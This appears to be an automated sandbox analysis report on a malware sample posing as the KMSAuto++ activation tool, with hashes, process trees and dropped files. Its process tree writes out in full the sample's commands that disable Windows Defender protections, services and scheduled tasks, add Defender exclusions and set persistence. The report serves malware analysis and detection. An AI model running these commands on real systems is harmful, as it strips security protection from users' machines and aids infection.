Analysis
Max time kernel: 152s
Max time network: 155s
Platform: windows10-2004_x64
Resource: win10v2004-20220812-es
Resource tags: arch:x64, arch:x86, image:win10v2004-20220812-es, locale:es-es, os:windows10-2004-x64, system:windows
Submitted: 06-02-2023 17:00
Static task: static1
Behavioral task: behavioral1 (Sample: KMSAuto++v1.6.4.exe, Resource: win7-20221111-es)
Behavioral task: behavioral2 (Sample: KMSAuto++v1.6.4.exe, Resource: win10v2004-20220812-es)
General
Target: KMSAuto++v1.6.4.exe
Size: 718.9MB
MD5: ef8cd375fdc780a87dbf601860994ab9
SHA1: b0aac6fb4006091219ba82a5838e810e0e27beba
SHA256: a6856516f42de63846610b121a0585472e252d40ffcaddba201c3b5fa2abb520
SHA512: 52db73a1bc0df076f74ed5fcb4d50ca7e46de6b7ee57cb7ee0223c96635dd01e4cafa403079fdeac25a219d402f5fdca608f76c8ed689540cac0d6c11b44c417
SSDEEP: 786432:yo0mvb9vOggaeuNz9jMWZZ7vHMH85G1p14NPlT2sp:yavx2ggaL11MccpyPR2
Signatures
Modifies Windows Defender Real-time Protection settings
Processes: reg.exe (5 instances)
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"
- reg.exe: Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection
- reg.exe: Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"
- reg.exe: Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection
- reg.exe: Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"
- reg.exe: Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"
- reg.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"
Modifies security service (2 TTPs, 1 IoC)
Processes: reg.exe
- reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes: KMSAuto++v1.6.4.exe, microsoft tap driver.exe
- KMSAuto++v1.6.4.exe: Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation
- microsoft tap driver.exe: Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation
Executes dropped EXE (5 IoCs)
Processes (PID, process):
- 1504 kms driver.exe
- 1980 kmsauto++v1.6.4.exe
- 1988 microsoft tap driver.exe
- 4500 svchost32.exe
- 4004 signtool.exe
YARA rule matches (resource, yara_rule):
- C:\Users\Admin\kmsauto++v1.6.4.exe: upx
- C:\Users\Admin\kmsauto++v1.6.4.exe: upx
- C:\Users\Admin\microsoft tap driver.exe: upx
- behavioral2/memory/1988-145-0x0000000000400000-0x000000000041F000-memory.dmp: upx
- C:\Users\Admin\microsoft tap driver.exe: upx
- behavioral2/memory/1980-155-0x0000000000400000-0x0000000001713000-memory.dmp: upx
- behavioral2/memory/1988-200-0x0000000000400000-0x000000000041F000-memory.dmp: upx
- behavioral2/memory/1980-201-0x0000000000400000-0x0000000001713000-memory.dmp: upx
Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: svchost32.exe
- svchost32.exe: Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce
- svchost32.exe: Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchost32.exe = "C:\\Users\\Admin\\svchost32.exe"
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class (1 IoC)
Processes: KMSAuto++v1.6.4.exe
- KMSAuto++v1.6.4.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Modifies system certificate store
Processes: signtool.exe
- signtool.exe: Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
- signtool.exe: Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = [certificate blob not included on this page]
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes (PID, process):
- 4500 svchost32.exe
Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes (PID, process):
- 1504 kms driver.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: kms driver.exe, WMIC.exe, WMIC.exe
- kms driver.exe (PID 1504): Token: SeDebugPrivilege
- WMIC.exe (PID 2036), each token recorded twice: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- WMIC.exe (PID 1660), each token recorded once: the same 21 tokens as above (SeIncreaseQuotaPrivilege through SeManageVolumePrivilege, then 33, 34, 35, 36)
Suspicious use of SetWindowsHookEx (3 IoCs)
Processes (PID, process):
- 1980 kmsauto++v1.6.4.exe
- 1988 microsoft tap driver.exe
- 4004 signtool.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: KMSAuto++v1.6.4.exe, kmsauto++v1.6.4.exe, microsoft tap driver.exe, cmd.exe (x5)
Writes grouped by source process (source PID, process -> target PID, target process):
- 4472 KMSAuto++v1.6.4.exe -> 1504 kms driver.exe; 1980 kmsauto++v1.6.4.exe; 1988 microsoft tap driver.exe; 4500 svchost32.exe
- 1980 kmsauto++v1.6.4.exe -> 4908 cmd.exe; 4904 cmd.exe; 4004 signtool.exe; 4360 cmd.exe; 1932 cmd.exe; 2376 cmd.exe
- 1988 microsoft tap driver.exe -> 2780 cmd.exe
- 4904 cmd.exe -> 2036 WMIC.exe
- 4360 cmd.exe -> 1660 WMIC.exe
- 1932 cmd.exe -> 2836 WMIC.exe
- 2376 cmd.exe -> 4372 WMIC.exe
- 2780 cmd.exe -> reg.exe (PIDs 3540, 3264, 3612, 3804, 1096, 3056, 1028, 992, 2500, 4196, 4828, 5100, 3064, 2812); 1624 schtasks.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\KMSAuto++v1.6.4.exe"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\kms driver.exe
    Command line: "C:\Users\Admin\kms driver.exe"
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\kmsauto++v1.6.4.exe
    Command line: "C:\Users\Admin\kmsauto++v1.6.4.exe"
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSAuto "C:\Users\Admin\AppData\Local\Temp\KMSAuto.tmp" /Y
    [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe
        Command line: WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\kmsauto++v1.6.4.exe"
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Users\Admin\AppData\Local\Temp\signtool.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\signtool.exe" verify /v /ph /sha1 648384a4dee53d4c1c87e10d67cc99307ccc9c98 "C:\Users\Admin\kmsauto++v1.6.4.exe"
      - Executes dropped EXE
      - Modifies system certificate store
      - Suspicious use of SetWindowsHookEx
    [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe
        Command line: WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Users\Admin\KMSAuto_Files"
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe
        Command line: WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjPatcher.exe"
    [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\Sysnative\cmd.exe" /c WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\Wbem\WMIC.exe
        Command line: WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\System32\SppExtComObjHook.dll"
  [2] C:\Users\Admin\microsoft tap driver.exe
    Command line: "C:\Users\Admin\microsoft tap driver.exe"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.bat "C:\Users\Admin\microsoft tap driver.exe""
      - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        - Modifies Windows Defender Real-time Protection settings
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      [4] C:\Windows\system32\schtasks.exe
        Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      [4] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      [4] C:\Windows\system32\reg.exe
        Command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        - Modifies security service
  [2] C:\Users\Admin\svchost32.exe
    Command line: "C:\Users\Admin\svchost32.exe"
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: AddClipboardFormatListener
Downloads
C:\Users\Admin\AppData\Local\Temp\AAEB.tmp\AAEC.tmp\AAED.bat
  Filesize: 3KB
  MD5: 3a981c51aac5475414f6dea9f4e6ae1a
  SHA1: 90fb6d188c3a6a04f9294fabc71f62635f0c3ea6
  SHA256: f6498b247cc03e1599bb19fc49dabb923b675bdfb0fd2348f78861842624f809
  SHA512: a8b49ee8606681f5559d3edddf1708df86f33b9029f140030037d4d2dff40bd288e0c69096be0ead4da4019c0ca5efcf81a33c7405bc82040fe833bb473f0e0b
C:\Users\Admin\AppData\Local\Temp\signtool.exe
  Filesize: 323KB
  MD5: 05624e6d27eaef0db0673ae627bd6027
  SHA1: b155c76bf59992a8d75d0e3a59dc94f24aff2591
  SHA256: 962a92821f54a1e706aa989973130fdc1072c7bd8b9e6d11ea1050b46eb9d313
  SHA512: 233304669aefeec9ad5d19bd2dd5bb19ea35ce31da0b3aabe5ab859259608a58725fac5993637c9635e5912138d3eb477773351f0ee81cc3ce756d713163cf31
C:\Users\Admin\kms driver.exe
  Filesize: 46KB
  MD5: 5f3f77593b1a5bc4e96257a38a8666b1
  SHA1: 532c981cd1a07ca62c97e9bc5f66fb4def4b2cc0
  SHA256: 1b18c8baa20838d3115f8d640f57c2d2e9e95d09780ace2067539574215a6d17
  SHA512: 59b1ac76f5a9a30680da37fc0d4d6aed370fdef189766c64697bfca1ba422a4a6517b94ad1de524e4af83b68f0eb3e9a209315c47b486f22c1849ffd8ec23200
C:\Users\Admin\kmsauto++v1.6.4.exe
  Filesize: 17.2MB
  MD5: f047284bfddc942292d93ed86fdb20fd
  SHA1: 56dc945674cf4f941cf17a9ac9c1c9718cf9d18e
  SHA256: 793731bcfd6cc4faf4244e2353d6d068a0720c601117e464f28c6e6e88de5c46
  SHA512: 2ec58f32b4fc810c41a014415997c35740eea7f901e367494025045c7c4a9ce1b83efbde2143c0566b66f1065bf39b712d4c9dbaa33ce922eb8d8f9f38da4513
C:\Users\Admin\microsoft tap driver.exe
  Filesize: 59KB
  MD5: e0b6a8a56069214d6dc31a2c053f73f7
  SHA1: 3eb13ab2e49014437c904f8ada2d22a85fd503e4
  SHA256: 4318860735858dab331f918367caf179c21dcae917df8119609d2edf58eaa5f9
  SHA512: 080409c159559060b898978b36378c848f882e6c033bb0fb8307478ebd346b418aea653627f456f523fd57626b0ce0b26e0fe323541a790c1fc96a33b9e2ed68
C:\Users\Admin\svchost32.exe
  Filesize: 533KB
  MD5: 4ec113ac1f8e7d4dda1270cc8bb00efc
  SHA1: 7a33598cab86959e8a3001ef0a2a756514de3aed
  SHA256: 7f43ffc3c653adeff9f3b0395a78ce797d23d1faacc782955387eb276997b0ad
  SHA512: 28954c19e7f60cd5ee404c4ed27eb85be6d8061b82a27a1aa8b873303350427bcaa081677f44fd6731050b6f184468c1f72739c1ae064034acfa006ec9b63bf2